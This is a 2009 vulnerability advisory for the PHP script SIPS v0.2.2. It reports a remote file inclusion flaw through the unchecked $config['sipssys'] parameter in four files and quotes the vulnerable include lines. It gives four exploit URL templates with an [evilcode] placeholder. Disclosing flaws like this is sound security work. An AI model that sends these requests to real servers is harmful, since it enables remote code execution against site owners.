Security Advisory: SIPS v0.2.2 Remote File Inclusion Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Vulnerabilities in LinksExchanger

From: Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date: 30.06.2009
Subject: SIPS v0.2.2 Remote File Inclusion Vulnerability

/================================================================================
===============================================================\
|

| [o] SIPS v0.2.2 Remote File Inclusion Vulnerability
|

|       Software : SIPS v0.2.2
|       Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip
|       Author   : Cru3l.b0y
|
     |
|               Home     : WwW.DeltaHacking.Net

|================================================================================
===============================================================|
|

| [o] Vulnerable file
|

|       search.php
|

|        include $config["sipssys"] ."/code/news.inc.php";
|
|

|       readmore.php
|

|                include $config["sipssys"] ."/code/news.inc.php";
|

|               index.php
|

|                include $config["sipssys"] ."/code/news.inc.php";
|        include $config["sipssys"] ."/code/box.inc.php";
|

|           search/submit.php
|

|                include $config["sipssys"] ."/code/search.inc.php";
|

|

|

| [o] Exploit

|

|       http://localhost/[path]/search.php?config["sipssys"]=[evilcode]
|       http://localhost/[path]/readmore.
php?config["sipssys"]=[evilcode]
|       http://localhost/[path]/index.php?config["sipssys"]=[evilcode]
|       http://localhost/[path]/search/submit.
php?config["sipssys"]=[evilcode]
|

test server